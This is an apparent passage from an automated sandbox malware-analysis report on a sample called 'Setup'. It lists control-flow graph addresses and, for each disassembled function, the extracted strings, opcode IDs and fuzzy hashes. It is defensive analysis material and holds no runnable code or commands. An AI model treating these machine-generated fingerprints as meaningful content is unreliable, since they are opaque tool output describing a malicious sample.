                                                                                                                                                                                                                                                              control_flow_graph 1768 2043c46-2043c8b call 2062da6 1771 2043c91-2043cee call 2036736 call 205e676 1768->1771 1772 204445b-204446b 1768->1772 1777 2043cf0-2043cf3 1771->1777 1778 2043cf5-2043d40 1777->1778 1779 2043d42-2043d46 1777->1779 1778->1777 1780 2043d48-2043d53 1779->1780 1781 2043d55 1780->1781 1782 2043d5a-2043d73 1780->1782 1783 2043e12-2043e15 1781->1783 1784 2043d75 1782->1784 1785 2043d7a-2043d85 1782->1785 1788 2043e17 1783->1788 1789 2043e19-2043e1e 1783->1789 1786 2043e01-2043e06 1784->1786 1785->1786 1787 2043d87-2043dfc call 2060116 1785->1787 1791 2043e08 1786->1791 1792 2043e0a-2043e0d 1786->1792 1787->1786 1788->1789 1793 2043e24-2043e38 1789->1793 1794 2044369-20443a2 call 205e696 1789->1794 1791->1783 1792->1780 1795 2043e3a-2043e57 1793->1795 1802 20443a4-20443a7 1794->1802 1798 2043e5d-2043e7e 1795->1798 1799 204402f-2044033 1795->1799 1801 2043e85-2043e88 1798->1801 1803 2044035-2044038 1799->1803 1804 2043ec2-2043ee0 call 2044476 1801->1804 1805 2043e8a-2043ec0 1801->1805 1806 20443f6-20443fa 1802->1806 1807 20443a9-20443f4 1802->1807 1808 2044040-2044051 call 205e676 1803->1808 1809 204403a-204403e 1803->1809 1804->1799 1821 2043ee6-2043f0f 1804->1821 1805->1801 1811 20443fc-2044402 1806->1811 1807->1802 1826 2044053-204405a 1808->1826 1827 204405f-2044061 1808->1827 1812 2044063-2044065 1809->1812 1817 2044404 1811->1817 1818 2044406-204441a 1811->1818 1814 2044335-2044341 1812->1814 1815 204406b-204408a 1812->1815 1822 2044345-204434d 1814->1822 1823 2044343-2044353 1814->1823 1820 204408c-204408f 1815->1820 1817->1772 1824 204441c 1818->1824 1825 204441e-2044424 1818->1825 1829 2044091-20440b6 1820->1829 1830 20440b8-20440f0 1820->1830 1831 2043f11-2043f14 1821->1831 1834 2044355-204435b 1822->1834 1823->1834 1833 204444b-204444e 1824->1833 1825->1833 1835 2044426-2044446 call 2060116 1825->1835 1828 204435d-204435f 1826->1828 1827->1812 1828->1795 1840 2044365-2044367 1828->1840 1829->1820 1836 20440f2-20440f5 1830->1836 1837 2043f16-2043f58 1831->1837 1838 2043f5a-2043f71 call 2044476 1831->1838 1841 2044454-2044459 1833->1841 1842 2044450-2044452 1833->1842 1834->1828 1835->1833 1843 2044144-2044151 1836->1843 1844 20440f7-2044142 1836->1844 1837->1831 1851 2043f73-2043f77 1838->1851 1852 2043f7c-2043f9c 1838->1852 1840->1794 1841->1811 1842->1772 1847 2044155-2044160 1843->1847 1844->1836 1849 2044167-2044180 1847->1849 1850 2044162 1847->1850 1854 2044187-2044192 1849->1854 1855 2044182 1849->1855 1853 204423c-204423f 1850->1853 1851->1803 1856 2043fa0-204402d call 2029716 call 2036376 call 2029726 1852->1856 1857 2043f9e 1852->1857 1859 2044241 1853->1859 1860 2044243-2044262 1853->1860 1861 2044227-2044230 1854->1861 1862 2044198-2044222 call 2060116 1854->1862 1855->1861 1856->1803 1857->1856 1859->1860 1866 2044264-2044267 1860->1866 1864 2044234-2044237 1861->1864 1865 2044232 1861->1865 1862->1861 1864->1847 1865->1853 1870 20442d5-20442e2 1866->1870 1871 2044269-20442d3 1866->1871 1873 20442e4-20442e8 1870->1873 1874 2044312-2044315 1870->1874 1871->1866 1877 20442ea-20442f1 1873->1877 1875 2044326-2044328 1874->1875 1876 2044317-2044324 call 205e696 1874->1876 1879 204432a-204432d 1875->1879 1876->1879 1881 2044301-2044304 1877->1881 1882 20442f3-20442ff 1877->1882 1879->1814 1884 204432f-2044333 1879->1884 1886 2044306-204430c 1881->1886 1887 204430e-2044310 1881->1887 1882->1877 1884->1828 1886->1887 1887->1874
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: !@$,$F$X$Y$Z$`$g$k
                                                                                                                                                                                                                                                              • API String ID: 0-3087819710
                                                                                                                                                                                                                                                              • Opcode ID: ba0be86c4ada160c30829c072d85f35d83072f4a6c0ac6cd3954f940b58f90ac
                                                                                                                                                                                                                                                              • Instruction ID: b47b291071f982445fd954ddede4d3e564581c00a79f6125b3d267a02bed5708
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ba0be86c4ada160c30829c072d85f35d83072f4a6c0ac6cd3954f940b58f90ac
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3432CEB160C3808FD3649F28C48436FBBE2ABC5314F198A7DE5D687391DBB98845DB52
                                                                                                                                                                                                                                                              Function 0204517D Relevance: 9.1, Strings: 7, Instructions: 331COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 3?:*$;<:;$Mjub$OXZN$b1fr$c|zz$frsc
                                                                                                                                                                                                                                                              • API String ID: 0-3937490319
                                                                                                                                                                                                                                                              • Opcode ID: c8393ccbf81fc2d0a527490b4eaabaa09511db74796bfbcb7880e0440f34c160
                                                                                                                                                                                                                                                              • Instruction ID: edcb9294d1aedef019d9e9373444dd66548a9348bd9affff946c66a24dd0fcea
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8393ccbf81fc2d0a527490b4eaabaa09511db74796bfbcb7880e0440f34c160
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0A136B5A007908BD721CF6A88D12A6BFE1FF56304B68D5ACC8959F742D7359807CB50
                                                                                                                                                                                                                                                              Function 02049F9F Relevance: 7.5, Strings: 6, Instructions: 37COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %@`P$_`fb$_j/E$mPIs$u1|y$~
                                                                                                                                                                                                                                                              • API String ID: 0-917711576
                                                                                                                                                                                                                                                              • Opcode ID: 47c8959c6f472cb3f10a12f0598ed440244d89fd2bf38cb0960535886e9a9342
                                                                                                                                                                                                                                                              • Instruction ID: 81a7cba0d9a4aefa89ad06f4447e49e15e10e18d59de53c60e90212f87782cb8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47c8959c6f472cb3f10a12f0598ed440244d89fd2bf38cb0960535886e9a9342
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A401FDB291C3409FD3648F25859026BFBF1EB92310F642A2CE6D197252CB36D8018F0B
                                                                                                                                                                                                                                                              Function 0203BAB6 Relevance: 7.5, Strings: 5, Instructions: 1261COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: ,-$4?]P$8?]P$[yz;$13
                                                                                                                                                                                                                                                              • API String ID: 0-3852501239
                                                                                                                                                                                                                                                              • Opcode ID: 006826186d0c5cc1b082a06bb6086a392d17bea1b80041679ae13fa29ec679d4
                                                                                                                                                                                                                                                              • Instruction ID: b5285b18524b874aa903e92bc1d0b85a75025d5eacaff4d0a5ea6bf6d40bb62b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 006826186d0c5cc1b082a06bb6086a392d17bea1b80041679ae13fa29ec679d4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F926634648340ABE766CB25C88076FBBE6EBC6708F18842DE5C1D7241E775D846EB27
                                                                                                                                                                                                                                                              Function 0203340C Relevance: 6.8, Strings: 5, Instructions: 527COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: ,$7$A$]$s
                                                                                                                                                                                                                                                              • API String ID: 0-407560218
                                                                                                                                                                                                                                                              • Opcode ID: 62a91d0e3756b855b05e938a0d0e896bc5a96b938526cf135fb87d24e60d3566
                                                                                                                                                                                                                                                              • Instruction ID: 57a8056d3a46334d4e401a14e780695fbb214f6d2d36528af247e0b009ef6355
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62a91d0e3756b855b05e938a0d0e896bc5a96b938526cf135fb87d24e60d3566
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39229072A0D7908FD325DF78C4807AEBBE6ABC9320F158A6ED4D987391D7348845DB42
                                                                                                                                                                                                                                                              Function 0203E2FD Relevance: 6.5, Strings: 5, Instructions: 226COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: !.$"x$e|$v}$PV
                                                                                                                                                                                                                                                              • API String ID: 0-1206060067
                                                                                                                                                                                                                                                              • Opcode ID: a6673277a72914f2d789342e6def55de6bb07888d9596f79a1f2ee515ace869b
                                                                                                                                                                                                                                                              • Instruction ID: c9ea312d8f7adc013b56fc3367fad87a36f81bfdc06025ab6635db9e9c059949
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a6673277a72914f2d789342e6def55de6bb07888d9596f79a1f2ee515ace869b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A81FFB261C350ABD309CFA5C8825AFFBE6EB84304F09992CE5D59B351E635C9098B47
                                                                                                                                                                                                                                                              Function 0205B1D6 Relevance: 5.6, Strings: 4, Instructions: 650COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: KH$\$ebc`$@F
                                                                                                                                                                                                                                                              • API String ID: 0-2875480975
                                                                                                                                                                                                                                                              • Opcode ID: a2fb2015542261549c03241551659a9c0e5ed343a8e9eef401b6b30e40893e7b
                                                                                                                                                                                                                                                              • Instruction ID: 7f219dd4200d8330d3ae05a0dd02fc1fe2bffbf52fef7146d9d4099cc4cf0954
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2fb2015542261549c03241551659a9c0e5ed343a8e9eef401b6b30e40893e7b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D220E72A083509FD314CF25CC817ABBBE1EBD5318F14892DE9959B391D778E906CB82
                                                                                                                                                                                                                                                              Function 0202E742 Relevance: 5.5, Strings: 4, Instructions: 524COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: <=$I^]N$V@EN$^LuF
                                                                                                                                                                                                                                                              • API String ID: 0-1130475721
                                                                                                                                                                                                                                                              • Opcode ID: 7de163438a5817f7d9e02fb56cdbbe25e43b5d1006e8b4115342a915960a3084
                                                                                                                                                                                                                                                              • Instruction ID: 89b1a6055aff64df07c552dfb8c52d0fc9e28dd3e0f426a3a862660fa3c8c547
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7de163438a5817f7d9e02fb56cdbbe25e43b5d1006e8b4115342a915960a3084
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 26F1BCB018D3D08BD7719F6594A87EBBBE0EB92304F240A6DC4D95B352D336050ADBA7
                                                                                                                                                                                                                                                              Function 0202C376 Relevance: 5.4, Strings: 4, Instructions: 393COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: gNOL$i6$tu$tu
                                                                                                                                                                                                                                                              • API String ID: 0-2880198370
                                                                                                                                                                                                                                                              • Opcode ID: 9a174e15cdd0a35ae460d3375b3816de51eea3da98b68cad10264b999b07f619
                                                                                                                                                                                                                                                              • Instruction ID: a29598d458d206a3e1cd3163893167d4a280d7cfa3cdc5ec00364531d94e08b4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a174e15cdd0a35ae460d3375b3816de51eea3da98b68cad10264b999b07f619
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3EC1F57664C3604BD321DF2888902AFFBE3ABC1244F0DCA2ED8D55B351E77585099B86
                                                                                                                                                                                                                                                              Function 0203B0E4 Relevance: 4.0, Strings: 3, Instructions: 299COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: $4$,$$iv
                                                                                                                                                                                                                                                              • API String ID: 0-2833606998
                                                                                                                                                                                                                                                              • Opcode ID: cc10a3166e3e3bdac010859659f38d3af5ad1962506aa119f1d52921a661521d
                                                                                                                                                                                                                                                              • Instruction ID: eba741d72b3301f98e8be58d1d8313ca242918e5d09b2926030f61f1bf6b0400
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cc10a3166e3e3bdac010859659f38d3af5ad1962506aa119f1d52921a661521d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47C120B144A3908BD7728F6188913DBBBE1FBA6318F149A2CC5CC1B264DB758512DF87
                                                                                                                                                                                                                                                              Function 0202A836 Relevance: 4.0, Strings: 3, Instructions: 281COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: ZA$g^nb$nPTR
                                                                                                                                                                                                                                                              • API String ID: 0-3259238971
                                                                                                                                                                                                                                                              • Opcode ID: eb8ee44825daa9a28b15deeb14c165f6d194f3b069b38e38ce38d223dca672f9
                                                                                                                                                                                                                                                              • Instruction ID: fa0225e466ebb794038f283a84c06e688057a1bb8a2d40ab0775aa4a5a144771
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb8ee44825daa9a28b15deeb14c165f6d194f3b069b38e38ce38d223dca672f9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E581082260C3918FD706CF39851037BBFE2AFD3214F1985AED4D59B282DB79890AD752
                                                                                                                                                                                                                                                              Function 0205ED66 Relevance: 3.2, Strings: 2, Instructions: 699COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: f$vwqq
                                                                                                                                                                                                                                                              • API String ID: 0-1440894120
                                                                                                                                                                                                                                                              • Opcode ID: 2bd3427c6ddd9bc9aee8bfdd17aa02d89c3b9f81fc53224449dddeffe67ece36
                                                                                                                                                                                                                                                              • Instruction ID: b176ac51e453c00ba9420c38be74e896018a0399e74b9510c2f65261dd41504b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2bd3427c6ddd9bc9aee8bfdd17aa02d89c3b9f81fc53224449dddeffe67ece36
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4522277560C3528BD765CF28C984B2BBBE2BBC6314F188A2CE9D587391E735D805DB42
                                                                                                                                                                                                                                                              Function 02025B16 Relevance: 2.8, Strings: 2, Instructions: 329COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: )$IEND
                                                                                                                                                                                                                                                              • API String ID: 0-707183367
                                                                                                                                                                                                                                                              • Opcode ID: 9de0241e4f8274ae63b6074617828de46a84310446004dea1cdfe93a4c99ec05
                                                                                                                                                                                                                                                              • Instruction ID: 57e89c4a0268cc3023195704ebcb08e46fa15a81d08bd2d190adf427aafcb6ce
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9de0241e4f8274ae63b6074617828de46a84310446004dea1cdfe93a4c99ec05
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7CD1CDB19083589FE724CF14CC84B9EBBE4EB84304F54492EF9999B381E375D908DB86
                                                                                                                                                                                                                                                              Function 020480F6 Relevance: 2.8, Strings: 2, Instructions: 301COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: "#$O'T!
                                                                                                                                                                                                                                                              • API String ID: 0-486316439
                                                                                                                                                                                                                                                              • Opcode ID: 883a0c6a5e9796bbbc24b9b79c9c601fe2130e97953369b43a43fc051fe91d05
                                                                                                                                                                                                                                                              • Instruction ID: f0215c8f9dc663945dff1876aebc287e6172910a383dd2d0c406b479737c42f4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 883a0c6a5e9796bbbc24b9b79c9c601fe2130e97953369b43a43fc051fe91d05
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3481F4B29083108BD7149F15CC9136BB7E2EFC1314F18C92DE9D69B390EB799405DB52
                                                                                                                                                                                                                                                              Function 02030548 Relevance: 2.8, Strings: 2, Instructions: 286COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: /$;'
                                                                                                                                                                                                                                                              • API String ID: 0-2146030619
                                                                                                                                                                                                                                                              • Opcode ID: d022b711af588176fdd694be2d571a38876f548141dca86f6aaedf49a02fa886
                                                                                                                                                                                                                                                              • Instruction ID: 2ed2863a834062ee6c54ac01882040411b69d5dfc1a9fd641b45870cadc4206c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d022b711af588176fdd694be2d571a38876f548141dca86f6aaedf49a02fa886
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 648196B2D893944BD334DB388C987DBBBD69FE6314F184A3CD4C997242E63842068797
                                                                                                                                                                                                                                                              Function 02062F36 Relevance: 2.6, Strings: 2, Instructions: 128COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: @$wvut
                                                                                                                                                                                                                                                              • API String ID: 0-695178842
                                                                                                                                                                                                                                                              • Opcode ID: 6518c7ccc989931711bf2cc50f91dcba8b7f45e6fe7cbf07ff7a56f1bc4f8011
                                                                                                                                                                                                                                                              • Instruction ID: f0932d5218eb54ee0e102aaa07421b720c6c81b9385c731d0d9a0a970d188717
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6518c7ccc989931711bf2cc50f91dcba8b7f45e6fe7cbf07ff7a56f1bc4f8011
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D3113719043108FE7049F24C89577BB7F1FF95728F14862CE9995B3A1E7359908CB86
                                                                                                                                                                                                                                                              Function 02037247 Relevance: 2.6, Strings: 2, Instructions: 113COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %M!O$2E#G
                                                                                                                                                                                                                                                              • API String ID: 0-1158732664
                                                                                                                                                                                                                                                              • Opcode ID: 20b4bbe9e574f78f67ad01d8ae9eb8c5f28740cb0fba37b92f8116b1d4e75126
                                                                                                                                                                                                                                                              • Instruction ID: b790674dc8ecb0b681947b0fb3048334ed784ce6729e35bf7f9433099a581ae8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 20b4bbe9e574f78f67ad01d8ae9eb8c5f28740cb0fba37b92f8116b1d4e75126
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6031D1B04093848BD7759F18C895BABF7F8FF46320F150A1CE8D99B2A1E3309510DB96
                                                                                                                                                                                                                                                              Function 02037256 Relevance: 2.6, Strings: 2, Instructions: 105COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %M!O$2E#G
                                                                                                                                                                                                                                                              • API String ID: 0-1158732664
                                                                                                                                                                                                                                                              • Opcode ID: 5434542f50e720f536ce989a90cea323d2c9b9c18c6d75140b451786e1ffda8a
                                                                                                                                                                                                                                                              • Instruction ID: 2c8ef3d555b340893ecc1c407e2f015e0cd776c50193a23b2a0186e73ee029aa
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5434542f50e720f536ce989a90cea323d2c9b9c18c6d75140b451786e1ffda8a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3131CDB04093848BD7669F18C895BABF7E8FF46320F150A1CE8D98B2A1E3309510DB56
                                                                                                                                                                                                                                                              Function 0204BFB6 Relevance: 2.6, Strings: 2, Instructions: 89COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 6G0A$g[0U
                                                                                                                                                                                                                                                              • API String ID: 0-3254980158
                                                                                                                                                                                                                                                              • Opcode ID: f4d5c189a62cbe6a729185d13aa3ce79c7349286dc5731ae0242f1e9f2a4dfe4
                                                                                                                                                                                                                                                              • Instruction ID: 56ed439009ab5b879838a5452325262a9a8c956f4f2c97b00cfc054ab106dd0f
